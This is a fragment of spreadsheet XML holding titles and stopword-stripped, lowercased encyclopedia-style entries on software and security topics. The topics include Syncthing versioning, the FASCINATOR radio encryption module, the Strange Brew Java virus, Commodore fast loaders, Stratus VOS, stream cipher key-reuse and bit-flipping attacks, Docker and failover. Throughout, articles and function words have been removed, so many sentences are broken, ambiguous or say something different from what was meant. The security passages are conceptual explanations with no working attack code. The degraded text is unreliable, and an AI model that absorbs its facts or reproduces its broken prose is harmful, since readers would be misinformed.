really bring major changes table. reflection developers widespread program fact already development almost years point. despite change major number jakob borg, lead developer, stated otherwise identical 0.14.55-rc.2alongside 1.0.0 release team introduced semver-like versioning system following criteria: version protocol incompatible previous would constitute major version. version changes rest database configuration changes would allow downgrading would constitute minor version. specific concerns above, patch version.in 1.1.0 syncthing adopted 1.12 loses compatibility windows windows server 20031.2.0 introduces support quic, perform automatic crash reporting deprecates small fixed blocks. 1.2.0 also dropped support communicating syncthing clients running 0.14.45 older.1.8.0 adds experimental folder option allows users specify file changes saved copy-on-write file systems also adds hole punching support.1.9.0 introduced option casesensitivefs allowed users disable newly added handling case insensitive filesystems.the 1.10.0 release gave users ability toggle whether would like broadcast global discovery network. also comparison file synchronization software references external links official website</t>
  </si>
  <si>
    <t>FASCINATOR</t>
  </si>
  <si>
    <t>fascinator series type encryption modules designed late-1980s installed motorola digital-capable voice radios. these radios originally built accept des-based encryption module approved classified communications. fascinator modules replaced units used classified conversations levels used appropriately classified keys. fascinator operates kbit/s encryption decryption. compatible des-based voice systems. originally supplied keys fascinator paper tape loading using koi-18 kyk-13 fill devices special adaptor cable. standard cryptoperiod days, i.e. keys changed weekly. fascinator adopted government federal standard 1023, establishes interoperability requirements regarding analog digital conversion, encryption (with related synchronization), modulation encrypted voice associated frequency modulation (fm) radio systems employing channels operating mhz. voice digitized using kbit/s continuously variable slope delta modulation (cvsd) encrypted using national security agency (nsa) commercial comsec endorsement program (ccep) type encryption algorithm based ky-57/58. sources operational security policy communications equipment fascinator, marine corps order 2231.2, 1989 fed-std 1023 telecommunications: interoperability requirements encrypted, digitized voice utilized with channel radios operating above</t>
  </si>
  <si>
    <t>Super Flexible</t>
  </si>
  <si>
    <t>super flexible file synchronizer backup file synchronization software allows backing synchronizing files different drives, different media (cd, dvd, flash, zip), remote server. features like allway sync, goodsync unison, capability remember previous state directories database, thus also synchronize deletions. also detect moved files move side. program fully supports unicode characters copy filenames languages. includes scheduler. support various internet protocols, including ftp, ftps, sftp/ssh, webdav, ssl, http, amazon storage. compression encryption support. copy files locked operating system. versioning, i.e. ability keep multiple older versions file backup. partial file updating file masks filters. also file synchronization backup disk image list backup software list disk imaging software references external links http://www.syncovery.com</t>
  </si>
  <si>
    <t>Fast Virtual Disk</t>
  </si>
  <si>
    <t>fast virtual disk (better known fvd) virtualization-oriented disk image file format developed qemu virtualization platform. differs existing paravirtualization-centric virtual disk image formats design emphasizes lack contention separation concerns host guest kernels deduplication filesystem block layer storage management. written either directly physical logical blockstore (avoiding host filesystem overheads), regular host file system file. strives maintain similarity disk layouts, eliminate host filesystem disk image compression overheads, minimize metadata-related overheads. also linux open source references external links fast virtual disk (fvd) qemu. tang, chunqiang. t.j. watson research center. january, 2011.</t>
  </si>
  <si>
    <t>Strange Brew (computer virus)</t>
  </si>
  <si>
    <t>strange brew first computer virus infects java code—applets programs written java—rather exploiting java virtual machine runtime interpreter. written 1998 university student demonstration self-replicating java code potential security flaw. standard security features java runtime interpreter prevent spread circumstances. references external links strange brew entry virus.wikidot.com, references</t>
  </si>
  <si>
    <t>FastBack</t>
  </si>
  <si>
    <t>fastback software application developed late 1980s early 1990s backing macintosh computers. originally written fifth generation systems, company located baton rouge, louisiana. when company wanted expand apple market purchased rebranded product touchstone software corporation. original fastback unique industry able read computer hard drive write floppy drive simultaneously using full capability dual-channel chip found personal computers time. when combined compression techniques proprietary disk format stored 720kb data 360kb 5¼-inch floppy disk (only 1.2mb drives), made fastback fastest backup programs time. version history 1984, fastback (version 5.13) already market.in 1987, fastback plus released. this version, subsequent versions, released unconditional guarantee harm resulting software terms conditions. guarantee contrasted industry norms. 1991, fastback plus 3.02 released.in february 1992 company released fastback plus windows, written running windows 3.0.fastback plus included novell 1994. fastback point bundled "drive 2.4" floppy disk drive marketed kennect technology.by 1992, fastback purchased symantec corp., went bundle application "norton fastback" version norton utilities macintosh. however, version norton fastback dropped norton's software utility package, bringing fastback. fastback macintosh v1.01/1.02 1987, v1.3 1988 fastback v2.10 1990 fastback plus v2.6 1991, v3.0.1 1992 features york times wrote standard (msbackup) utility, "cannot automatically awaken a.m. make full backup onto quarter-inch cassette drive." reception byte 1989 listed fastback plus among "distinction" winners byte awards, stating hard drive, recommend package". references external links pearce, michael (february 1998). "macking 31". computer bits. archived original 2006-11-30. retrieved september 2020. note dave decker entitled "beware fastback"</t>
  </si>
  <si>
    <t>Fast user switching</t>
  </si>
  <si>
    <t>fast user switching feature multi-user operating system allows users switch user accounts without quitting applications logging out. linux linux kernel's subsystem dates back 1993 understand concept multiple "seats", meaning vts, active given time. despite kernel limitation, multiseat supported linux. feature "fast user switching" less severe necessities multi-seat multiple users work simultaneously, therefore simply works.the straight forward solution elegant multi-seat kmscon/systemd-consoled combination systemd-logind. available desktop environments gnome software compilation adapt graphical login session manager (e.g. gdm, sddm, lightdm, etc.) underneath solution configured implement fast user switching way. installations older environments, functionality must enabled appropriate configuration files sequence ctrl-alt-f8 pressed. separate login window appear second user even first user again). alternatively, default install, sessions started using different display parameters different virtual terminals (e.g. "startx -query localhost"). again, sequences allow user switching take place. fast user switching potentially introduce various security-related complications, handled differently among operating systems, advantages disadvantages. possibility, simple secure, first user gets ownership resources. second option grant ownership resources user. last takes ownership. third allow users access shared resources. this easier intuitive, allows (for example) user record another user's conversation. windows, shared resources, sound, available sessions. linux, default behavior give ownership "console resources" first connected session, share resources among groups console users configured manage console ownership differently. microsoft windows fast user switching windows based remote desktop services technology. windows gina component winlogon, fast user switching interacts, programmatically called automate fast user switch. powertoy known super fast user switcher offered 2002 microsoft. allowed fast user switching using keyboard hotkey (win+q) (similar alt-tab) without even going welcome screen. later made unavailable original powertoys replaced updated versions, still works windows (32-bit) running administrator. windows vista, gina replaced credential providers, however support programmatic initiation fast user switching.in windows fast user switching unavailable computer windows server domain network offline files enabled. windows vista later longer restrictions. fast user switching also available windows serialkeys accessibility option allows users speech augmentation devices) client services netware installed. also time-sharing multiseat configuration references external links architecture fast user switching windows</t>
  </si>
  <si>
    <t>Fast loader</t>
  </si>
  <si>
    <t>fast loader software program home computer, commodore spectrum, accelerates speed file loading floppy disk compact cassette. floppy disks fast loaders came discrepancy actual speed floppy drives could transfer data speed provided operating system's default routines. this discrepancy pronounced commodore vic-20 while earlier commodore series used industry-standard ieee-488 parallel bus, replaced custom commodore serial vic-20. serial intended nearly fast predecessor, 6522 hardware shift register drive computer. however, hardware bugs discovered 6522 prevented function working consistently. result, kernal routines hastily rewritten transfer single time, using slow software handshaking protocol.although replaced 6522 6526 chips, suffer bug, companion 1541 disk drive still 6522 via. commodore chose redesign 1541 hardware, also order retain backward compatibility vic-20 peripherals; however came expense speed. because transfer protocol, commodore 1540 1541 disk drives soon gained reputation extreme slowness. only introduction commodore computer commodore 1571 disk drive original plan action hardware shift register used, reducing need special fast loaders. soon c64's release, astute programmers realized commodore's bit-banging serial kernal routines unnecessarily sluggish. since approximately speed 1541 disk drive, sufficient synchronize beginning byte, rather individual bit. moreover, transfer method allowed bits sent simultaneously, standard data line line (which normally used perform handshaking). c64, required careful timing avoid interference interrupts vic-ii graphics chip, could "steal" cycles. some fast loaders disabled interrupts blanked screen reason. fast loader would generally "wedge" load vector $0330, thus intercepting calls kernal load routine. next, fast loader would transfer necessary code drive order execution, receive file sent altered transfer code. depending exact nature routines used, loading speed could improved much factor five. this technique used many fast-load systems made (such jiffydos). others simply efficient file handling, offering marginal good improvement. other products added parallel hardware. various software companies released fast loaders c64, usually cartridge form. united states, probably popular cartridge epyx fastload. most fast loader cartridges also incorporated features increase ease use. on-board implementation commodore's wedge included fast loader cartridges. machine language monitors, disk editors, various convenience commands commodore basic also common additions. some fast loader cartridges sophisticated, incorporating reset button, "freeze" capabilities, simple onboard gui. final cartridge perhaps successful genre. commercial fast loaders, notably cmd's jiffydos, cartridge-driven instead replaced kernal 1541. while difficult install, offered greatly increased compatibility, almost invisible software running machine. cartridge, action replay loader loads block program around seconds. warp loader times faster, programs loaded loader saved disk cartridge present. whereas armk6 fastloader compatible software, final cartridge known crash often, programs loaded normal mode, deactivating cartridge, making less useless. many commercial programs c64, especially games, contained fast-loading routines distribution media. user would load small "stub" program disk standard slow routines, would install faster transfer routines computer drive proceeding load rest program high speed. this way, user benefited fast loader without know dedicated fast-loader product. several popular commodore magazines published type-in fast loading software. april 1985, compute! published turbodisk, fast loader included vic-20 versions. this program proved popular republished july 1985 issue compute!'s gazette.it printed august 1986, without vic-20 version, several accompanying utilities relocate program memory create auto-booting software took advantage turbodisk's speed. commodore version also included c128 users still 1541 disk drives.compute!'s gazette also published several utilities speed c64-to-1541 communications, including turbo copy 4-minute full-disk copier), turbosave utility accelerated speed disk saves) quick! (another fast loader).run magazine published sizzle! december 1987, integrated package included relocatable fast loader autoboot generation capability. byte published loader, machine-language fast-loading software apple 3.3, november 1983. compute! published turbodisk october 1986.the type-in fast loader fashion continued internet. krill's loader (2009) spindle (2013) examples c64-to-1541 "irq loaders", fast loaders allow programs (mainly games) keep irqs loading. with modern loaders slow rate decoding proved bottleneck, modern loaders carry optimized routines such. cassette tapes built-in routines storing reading data compact cassette tapes made safe storing rather speed. better tape-quality 1980s made possible store data effectively, reducing loading time tape length. such programs existed several computers, ohio scientific challenger. rabbit program pet, turbotape commodore datassette. turbo 2000 similar system atari.speedlock software protection system used spectrum amstrad cpc, written david aubrey-jones david looker 1983. programmers become frustrated slow loading times computer's tape loading system, realised would possible write better one. prototype unused year, finally picked ocean software daley thompson's decathlon, released late 1984. subsequently used u.s. gold several titles ultimate play game, amongst others. speedlock also ported amstrad 1985. system used several advanced features spectrum's architecture, memory refresh register parity branch instructions processor, made harder create illegitimate copies without protection. early versions used audible "clicking" lead tones loading program. later versions include this, instead counter showing time left finish loading program, similar technician fairlight.some companies created software bypass protection schemes, including speedlock, purpose backing transferring microdrive, spectrum proprietary disk systems.invade-a-load fast loader cassette-based games accelerated loading blocks tape, also contained mini-game case, clone space invaders) could played waiting main game finish loading. invade-a-load allowed user play small clone famous space invaders game main game loading. this initial minigame loaded minute, providing entertainment waiting actual game load, could take five minutes. least occasion, reviewer expressed preference invade-a-load main game itself. mostly appeared games sold united kingdom, time written, commodore market united states mostly switched floppy disk media. loader written richard aplin mastertronic's use. loader copyright date 1987, first games used loader showed 1988. over following years, mastertronic used loader dozens titles. loader also memorable soundtrack, originally made hubbard mastertronic title droid. price 1541 disk drive beyond means many target audience owners, enormous demand fast loaders games. first loader llamasoft jeff minter's classic "revenge mutant camels" came fast loading version side cassette conventional loading version other. soon enough software houses jumped board. ocean used "pavloda" real breakthrough came novaload software allowed loading screens music play. "daley thompson's decathlon" visible example this. gold releases became infamous playing national anthem showing character version stars stripes games loaded. other notable releases included "hypersports" imagine/ocean animated sprites runners game loaded impressive soundtracks martin galway including version chariots fire. optical discs 1995, yoichi hayashi namco ltd. invented variant invade-a-load technique optical disc based platforms playstation applied patent. u.s. patent 5,718,632 granted february 1998 assigned namco despite invade-a-load prior art. also commodore disk tape emulation references</t>
  </si>
  <si>
    <t>Faraday (company)</t>
  </si>
  <si>
    <t>faraday florham park, jersey company specializes fire protection systems. history faraday founded 1875 brooklyn, york. early 1900s, company owned stanley patterson, electrical supplies conglomerate. around time, faraday began producing notification appliances, bells, horns, buzzers, etc. they also rebranded coded fire alarm stations holtzer-cabot. from 1930s 1960s, faraday known "sperti-faraday", company moved adrian, michigan. from late 1960s present, many companies rebranded faraday's popular line notification appliances, including simplex, standard electric time company, pyrotronics, gamewell, fci, more. 1978, faraday bought standard electric time, around time, moved location tecumseh, michigan. 1977, faraday bought s.h. couch, continued manufacture iconic "chevron" pull station, originally designed couch 1950s. siemens currently manufactures "chevron" pull station addressable version. purchase siemens wheelock lawsuit 1995, faraday bought cerberus pyrotronics, 1998, cerberus pyrotronics bought siemens. faraday moved current florham park location. soon buyout, wheelock responded lawsuit siemens patent infringement since thought faraday signals used similar design signals, siemens lost 2007, result lawsuit, faraday discontinued entire line notification appliances years favor wheelock's line part agreement. however, 2015, eight years lawsuit, siemens restart production notification appliances, sticking wheelock devices. faraday continued make fire alarm panels small-to-mid-size applications, along line initiating devices 2015, siemens discontinued faraday brand absorbed company. product line 2000s, company announced fire-smart series alarm detectors provide advanced detection true fire smoke conditions eliminate false alarms. series intelligent addressable alarm panels utilized electronic signature device determine alarm, trouble, maintenance alert status. these panels could provide amps alarm signaling power notification appliance circuits; however, six- eight-amp power supplies also available expand notification capabilities. company also offers line voice-evacuation systems capable real-voice recording, redundant amplifiers, 1,000 monitoring control points total control. programming correlations define fire alarm alert messages. common uses alert tones include general evacuation, severe weather messages, alerts. references external links faraday history faraday siemens building controls</t>
  </si>
  <si>
    <t>Stratus VOS</t>
  </si>
  <si>
    <t>stratus (virtual operating system) proprietary operating system running stratus technologies fault-tolerant computer systems. available stratus's ftserver continuum platforms. customers support high-volume transaction processing applications require continuous availability. notable operating systems fully lockstepped hardware. during 1980s, version stratus existed called system/88 operating system. history designed inception high-security transaction-processing environment tailored fault-tolerant hardware. incorporates much design experience came mit/bell-laboratories/general-electric (later honeywell) multics project. 1984, stratus added unix system implementation called unix system facilities (usf) vos, integrating unix kernel level.in recent years, stratus added posix-compliance, many open source packages vos.like competing proprietary operating systems, seen market share shrink steadily 1990s early 2000s. development programming provides compilers pl/i, cobol, pascal, fortran, (with compilers), (also gcc). each programming languages make system calls (e.g. s$seq_read read record file), extensions support varying-length strings pl/i style. developers typically code favourite text editor, offline, compiling system; applications. history, stratus offered hardware platforms based motorola 68000 microprocessor family ("ft" "xa" series), intel i860 microprocessor family ("xa/r" series), pa-risc processor family ("continuum" series), intel xeon processor family series"). versions offer compilers targeted native instruction set, versions offer cross-compilers. stratus added support posix release 14.3 continuum), added support c/c++ compiler, debugger, many posix commands release 14.4. each additional release added posix.1 capabilities, point many user-mode open-source packages successfully built. reason, beginning release 17.0, stratus renamed openvos. stratus offers supported ports samba, openssl, openssh, privacy guard, openldap, berkeley mysql community server, apache, websphere community edition java. numeric values always endian, regardless endianness underlying hardware platform. little endian servers processors, compilers byte swap reading writing values memory transform data native little endian format. command macro language fairly complete command macro language used create menu systems, automate tasks etc. command macros accept arguments command-line user interface "form". arguments defined beginning command macro "parameters" section. language supports range statements, including if/then/else, boolean operations, "while" loops, "goto" excellent error reporting. command macro language executed interactive non-interactive (batch started process) modes. used automate programs, capturing prompts sending appropriate responses. this stratus limit capabilities command macro language.the macro language lacks support user-defined functions easily support include files. string handling prone errors, especially embedded control characters. overview coded mainly pl/i small amount assembly language migrated ftserver series. 1991, system written pl/i assembly.its overall structure much common multics, many system's features traced back multics varying degrees. system exposes number fundamental abstractions software designer programmer, notable processes devices hard disks various mechanisms tasksa process scheduled entity process attributes govern manipulated system. example, processes user name process name. former used determine process's access rights external devices items file system. fundamental significance process's privileged flag, binary attribute. privileged processes perform privileged operations. this mechanism used restrict certain potentially powerful operations system wide consequences (e.g. shutting system, dismounting hard disk etc.). distribution distributed stratus technologies. distribution media tape continuum, sdlt tape early series platforms. openvos release 17.0, stratus offers support distributing openvos downloading release file. software installations done stratus field engineer customer's system administrator. interface command-line interface main, powerful, user interface system. users locked "form" based sub-system command macro scripts required, although skilled user would able break command-line access. fact, possible stratus system administrator user's account attempt break fms—the stratus forms management system—to command line results user logged out.) command macros programs invoked argument display form listing available parameters, user navigate using "tab" key. each parameter generally restricted control user input. this includes lists valid values, numeric-only, text-only, etc. parameters also hidden using "secret" tag, made mandatory. commands defined full underbars separate words. example, change_current_dir changes working directory. help system uses convention assist users looking subset possible commands; instance, referring "change" found help -match change. users customize command interface means file contains abbreviations commands. command abbreviations conventionally named first letters command represent, expanded change_current_dir foodir. applications system applications used continuum ftserver systems, designed highly fault-tolerant. such, systems typically used safety-critical mission-critical applications, typically banks, hospitals, telecommunications transaction processing companies. communications supports following protocols tcp/ip x.25 sdlc/qllc async bisync lapb poll/select rje/hasp alc/slc visa, s.w.i.f.t., nasdaq, fas, chips, amex seriesolder versions implemented non-osi standard tcp/ip known tcp/ip (operating system tcp/ip.) since version 14.x implemented osi-compliant streams-tcp. older applications using tcp/ip ported order stcp. this mean loss functionality tcp/ip supported several functions osi-compliant therefore abandoned. ftserver hardware series runs supports tcp/ip x.25 (x.25 equipped optional nio.) websphere (a.k.a. series) tcp/ip based; also supported ftserver hardware. devices supporting legacy protocols continuum hardware accessed current hardware open stratalink network. fault tolerance fault tolerance built bottom hardware level, major devices lockstepped duplex mode, meaning identical devices performing action time. addition, device, board, also duplexed order identify internal board failures hardware level, stratus hardware defined "lock stepped".) these boards actively monitored operating system correct minor inconsistencies (such disk-writes reads). boards report unacceptable number faults removed service system; duplexed board continue operation problem resolved hot-fix. this includes cpus, disk drives, device logically duplexed (which definition, excludes communications devices). system continue processing normal automatically raise fault ticket stratus customer service (the remote service network). stratus customer service dial system using investigate problem dispatch replacement parts. operating system designed avoid crashes simplexed hardware failure. file system supports number unique file types: stream files: stream binary data, corresponding directly concept file operating systems. fixed files: sequence records fixed size. relative files: sequence records fixed file supporting random access sequential files: sequence records variable size queue files: file-system based backup message queues pipes: named pipes inter-process communication transaction files: provide support journal based rollbackthe allows creation multiple indexes file, sorting according contents record, external key, internal key, well-defined multiple keys. file indexes used c-isam database table. uses proprietary file naming syntax includes system name, module name, disk number, directory, components separated symbol. typically system disk housed module cpu, #m1, system file cluster would referenced (%system)#m1_d01&gt;system&gt;devices.table disk allocation memory organised "blocks", block 4,096 bytes. memory takes form paging. systems support paging partitions paging files. modern versions vos, paging files created dynamically sysadmin (but removed without reboot). these paging files theory consist extent (which viewed kernel mini-paging partition) contiguous. however, non-contiguous extents recommended greatly increase disk activity. admin create largest possible extent paging files early possible system booted. file system security supports write, read, execute, null (no) access files, directories devices (although directories files slightly different access lists). access assigned users, groups, world. only read access required executable program, provided user "status" access directory program resides. inherited access control lists multics also implements directory access control lists. file access control list, containing directory's default access control list applies. access devices typically controlled creating file linked device administrator. (this true openvos, apply original operating system.) access given file, sets access device. open stratalink always network-aware operating system. virtually every system call native parameter determines computer operation affects. operation local, redirected target computer remote subroutine call. example, file names parsed indicate computer file resides stratalink networking model level hierarchy naming computers: each computer called module modules aggregated systems. each system administered unit. words, modules system aware disks hardware devices system. result file name begins system name refers files computers opened without need special networking. true devices. other system entities, processes, referenced using module names written %system#module. system module names defined relationship addresses domain names—the developed late 1980—before internet widely adopted long urls even invented. historically, stratalink proprietary 10mb csma/cd ring network allowed high performance (for time) memory overhead utilization. this never developed beyond 10mb dropped favor using tcp/ip ethernet became dominant networking standard memory processing cheaper. open stratalink also x.25 wide area communications. using open stratalink protocols wide area communications also referred stratanet. also comparison command shells tandem computers references external links official openvos website comp.sys.stratus stratus public server stratus documentation site</t>
  </si>
  <si>
    <t>Stream cipher attacks</t>
  </si>
  <si>
    <t>stream ciphers, plaintext bits combined cipher stream exclusive-or operation (xor), secure used properly. however, vulnerable attacks certain precautions followed: keys must never used twice valid decryption never relied indicate authenticity reused attack stream ciphers vulnerable attack used twice (depth two) more. send messages length, encrypted using key, stream cipher produces string bits c(k) length messages. encrypted versions messages are: e(a) e(b) cwhere performed bit. adversary intercepted e(a) e(b). easily compute: e(a) e(b)however, commutative property (self-inverse) e(a) e(b) message longer other, adversary truncates longer message size shorter attack reveal portion longer message. words, anyone intercepts messages encrypted key, recover form running cipher. even neither message known, long messages natural language, cipher often broken paper-and-pencil methods. during world british cryptanalyst john tiltman accomplished lorenz cipher (dubbed "tunny"). with average personal computer, ciphers usually broken matter minutes. message known, solution trivial. another situation recovery trivial traffic-flow security measures station sending continuous stream cipher bits, null characters (e.g. ltrs baudot) sent real traffic. this common military communications. case, transmission channel fully loaded, good likelihood ciphertext streams nulls. goes great lengths prevent keys used twice. 1960s-era encryption systems often included punched card reader loading keys. mechanism would automatically card half card removed, preventing reuse.: avoid problem initialization vector (iv), sent clear, combined secret master create one-time stream cipher. this done several common systems popular stream cipher rc4, including wired equivalent privacy (wep), wi-fi protected access (wpa) ciphersaber. many problems short, bits. this meant high likelihood would used twice thousand packets sent master (see birthday attack), subjecting packets duplicated reuse attack. this problem fixed changing "master" frequently. bit-flipping attack suppose adversary knows exact content part messages. part middle attack replay attack, alter content message without knowing key, say, example, knows portion message, electronics fund transfer, contains ascii string "$1000.00". change "$9500.00" xoring portion ciphertext string: "$1000.00" "$9500.00". works, consider cipher text send c(k) "$1000.00". message adversary creating (c(k) "$1000.00") ("$1000.00" "$9500.00") c(k) "$1000.00" "$1000.00" "$9500.00" c(k) "$9500.00"recall string xored produces zeros string zeros xored another string leaves string intact. result, c(k) "$9500.00", ciphertext would $9500 correct amount. bit-flipping attacks prevented including message authentication code increase likelihood tampering detected. chosen-iv attack stream ciphers combine secret agreed initialization vector (iv) produce pseudo-random sequence time-to-time re-synchronized. "chosen attack relies finding particular iv's taken together probably reveal information secret key. typically multiple pairs chosen differences generated key-streams analysed statistically linear correlation and/or algebraic boolean relation (see also differential cryptanalysis). choosing particular values initialization vector expose non-random pattern generated sequence, attack computes bits thus shortens effective length. symptom attack would frequent re-synchronisation. modern stream ciphers include steps adequately secret initialization vector, usually performing many initial rounds. references external links security algorithm "attacks stream ciphers: survey" brief 2014 overview different stream cipher attacks "attacks stream ciphers: perspective" talk slides 2011</t>
  </si>
  <si>
    <t>Docker (software)</t>
  </si>
  <si>
    <t>docker platform service (paas) products os-level virtualization deliver software packages called containers. service free premium tiers. software hosts containers called docker engine. first started 2013 developed docker, inc. background containers isolated another bundle software, libraries configuration files; communicate well-defined channels. because containers share services single operating system kernel, fewer resources virtual machines. operation docker package application dependencies virtual container linux, windows, macos computer. this enables application variety locations, on-premises, public (see decentralized computing, distributed computing, cloud computing) private cloud. when running linux, docker uses resource isolation features linux kernel (such cgroups kernel namespaces) union-capable file system (such overlayfs) allow containers within single linux instance, avoiding overhead starting maintaining virtual machines. docker macos uses linux virtual machine containers.because docker containers lightweight, single server virtual machine several containers simultaneously. 2018 analysis found typical docker case involves running eight containers host, quarter analyzed organizations host.the linux kernel's support namespaces mostly isolates application's view operating environment, including process trees, network, user mounted file systems, kernel's cgroups provide resource limiting memory cpu. since version 0.9, docker includes component (called "libcontainer") virtualization facilities provided directly linux kernel, addition using abstracted virtualization interfaces libvirt, systemd-nspawn.docker implements high-level provide lightweight containers processes isolation. docker containers standard processes, possible kernel features monitor execution—including example tools like strace observe intercede system calls. components docker software service offering consists three components: software: docker daemon, called dockerd, persistent process manages docker containers handles container objects. daemon listens requests sent docker engine api. docker client program, called docker, provides command-line interface (cli), allows users interact docker daemons. objects: docker objects various entities used assemble application docker. main classes docker objects images, containers, services.a docker container standardized, encapsulated environment runs applications. container managed using docker cli. docker image read-only template used build containers. images used store ship applications. docker service allows containers scaled across multiple docker daemons. result known swarm, cooperating daemons communicate docker api. registries: docker registry repository docker images. docker clients connect registries download ("pull") images upload ("push") images built. registries public private. main public registry docker hub. docker default registry docker looks images. docker registries also allow creation notifications based events. tools docker compose tool defining running multi-container docker applications. uses yaml files configure application's services performs creation start-up process containers single command. docker-compose utility allows users commands multiple containers once, example, building images, scaling containers, running containers stopped, more. commands related image manipulation, user-interactive options, relevant docker compose address container. docker-compose.yml file used define application's services includes various configuration options. example, build option defines configuration options dockerfile path, command option allows override default docker commands, more. first public beta version docker compose (version 0.0.1) released december 2013. first production-ready version (1.0) made available october 2014. docker swarm provides native clustering functionality docker containers, turns group docker engines single virtual docker engine. docker 1.12 higher, swarm mode integrated docker engine. docker swarm utility allows users swarm containers, create discovery tokens, list nodes cluster, more. docker node utility allows users various commands manage nodes swarm, example, listing nodes swarm, updating nodes, removing nodes swarm. docker manages swarms using raft consensus algorithm. according raft, update performed, majority swarm nodes need agree update. docker volume facilitates independent persistence data, allowing data remain even container deleted re-created. history docker inc. founded kamel founadi, solomon hykes, sebastien pahl combinator summer 2010 startup incubator group launched 2011. startup also startups founder's first cohort. hykes started docker project france internal project within dotcloud, platform-as-a-service company.docker debuted public santa clara pycon 2013. released open-source march 2013. time, used default execution environment. year later, release version 0.9, docker replaced component, libcontainer, written programming language.in 2017, docker created moby project open research development. adoption september 2013: docker announced collaboration around fedora, enterprise linux (rhel), openshift. october 2014: microsoft announced integration docker engine windows server, well native support docker client role windows. november 2014: docker container services announced amazon elastic compute cloud (ec2). november 2014: docker announced partnership stratoscale. december 2014: announced strategic partnership docker enables docker integrate closely cloud. june 2015: docker several companies announced working vendor operating-system-independent standard software containers. december 2015: oracle cloud added docker container support acquiring stackengine, docker container startup. april 2016: windocks, independent released port docker's open source project windows, supporting windows server 2012 server 2016, editions server 2008 onward. 2016: analysis showed following organizations main contributors docker: docker team, cisco, google, huawei, ibm, microsoft, hat. june 2016: microsoft announced docker could used natively windows january 2017: analysis linkedin profile mentions showed docker presence grew 160% 2016. 2019: microsoft announced second version windows subsystem linux (wsl). docker, inc. announced started working version docker windows runs particular, means docker windows home (previously limited windows enterprise since used hyper-v). august 2020: microsoft announced backport wsl2 windows versions 1903 1909 (previously wsl2 available version 2004) docker developers announced availability docker platforms. august 2021: docker desktop windows macos longer free enterprise users. docker ended free docker desktop larger business customers replaced free plan personal plan. docker linux distros remains unaffected. also devops devops toolchain gvisor kubernetes list linux containers microservices os-level virtualization service component architecture singularity docker alternative clusters references external links official website container terminology practical terminology</t>
  </si>
  <si>
    <t>Failover</t>
  </si>
  <si>
    <t>failover switching redundant standby computer server, system, hardware component network upon failure abnormal termination previously active application, server, system, hardware component, network computer network. failover switchover essentially operation, except failover automatic usually operates without warning, switchover requires human intervention. systems designers usually provide failover capability servers, systems networks requiring near-continuous availability high degree reliability. server level, failover automation usually uses "heartbeat" system connects servers, either using separate cable (for example, rs-232 serial ports/cable) network connection. long regular "pulse" "heartbeat" continues main server second server, second server bring systems online. there also third "spare parts" server running spare components "hot" switching prevent downtime. second server takes work first soon detects alteration "heartbeat" first machine. some systems ability send notification failover. certain systems, intentionally, failover entirely automatically, require human intervention. this "automated manual approval" configuration runs automatically human approved failover. failback process restoring system, component, service previously state failure back original, working state, standby system functioning back standby. virtualization software allowed failover practices become less reliant physical hardware process referred migration running virtual machine moved physical host another, little disruption service. history term "failover", although probably engineers much earlier, found 1962 declassified nasa report. term "switchover" found 1950s describing '"hot" "cold" standby systems', current meaning immediate switchover running system (hot) delayed switchover system needs starting (cold). conference proceedings 1957 describes computer systems emergency switchover (i.e. failover) scheduled failover (for maintenance). also references</t>
  </si>
  <si>
    <t>Failing badly</t>
  </si>
  <si>
    <t>failing badly failing well concepts systems security network security (and engineering general) describing system reacts failure. terms popularized bruce schneier, cryptographer security consultant. failing badly system fails badly catastrophic result failure occurs. single point failure thus bring whole system. examples include: databases (such credit card databases) protected password. once security breached, data accessed. fracture critical structures, buildings bridges, depend single column truss, whose removal would cause chain reaction collapse normal loads. security checks concentrate establishing identity, intent (thus allowing, example, suicide attackers pass). internet access provided single service provider. provider's network fails, internet connectivity lost. systems, including social ones, rely single person, who, absent becomes permanently unavailable, halts entire system. brittle materials, "over-reinforced concrete", overloaded, fail suddenly catastrophically warning. keeping copy data central place. that data lost forever place damaged, 1836 u.s. patent office fire, american 1973 national personnel records center fire, destruction library alexandria. failing well system fails well compartmentalizes contains failure. examples include: compartmentalized hulls watercraft, ensuring hull breach compartment flood entire vessel. databases allow downloads data attempt, limiting amount compromised data. structurally redundant buildings conceived resist loads beyond expected normal circumstances, resist loads structure damaged. computer systems restart proceed stopped state invalid operation occurs. access control systems locked power unit. concrete structures show fractures long breaking load, thus giving early warning. armoured cockpit doors airplanes, confine potential hijacker within cabin even able bypass airport security checks. internet connectivity provided vendor discrete path, known multihoming. star mesh networks, continue operate node connection failed (though star network, failure central still cause network fail). ductile materials, "under-reinforced concrete", overloaded, fail gradually yield stretch, giving warning ultimate failure. making backup copy important data storing separate place. that data recovered location either place damaged.designing system 'fail well' also alleged better limited security funds typical quest eliminate potential sources errors failure. also fail-safe design feature practice fault tolerance resilience systems component failures errors fail-deadly concept nuclear military strategy resilience (network) ability network remain functional faults resilience (engineering construction) infrastructure design able absorb damage without suffering complete failure references</t>
  </si>
  <si>
    <t>Doctor Who: Worlds Apart</t>
  </si>
  <si>
    <t>doctor who: worlds apart upcoming free-to-play online blockchain digital collectible card game sidefork ethereum developed published reality gaming group, based upon television series doctor who. game release 2022 mobile devices. gameplay players control time lord, races series, need challenge opponents card decks build. card sets cards game operate reality gaming group's digital asset trading (dat) platform. each card minted "sidechain" traded sold marketplaces. prior game's release, cards available collect starting october, 2020.a time lord victorious consisting cards released august 2021 featuring different packs, core premium packs, former available unlimited supply latter featuring unique card frame limited 10,000 packs. development game first announced august, 2020 partnership studios reality gaming group create digital trading card game based doctor using blockchain technology. this would allow collectible secured protected tokenising non-fungible tokens (nfts).reality's co-founder tony pearce said understanding "what proved difficult doctor fans start. together bbc, hoped "educate younger doctor fans value utility cards."on december 2021, game's early access launched accessible players held founders token. references external links official website</t>
  </si>
  <si>
    <t>Fail2ban</t>
  </si>
  <si>
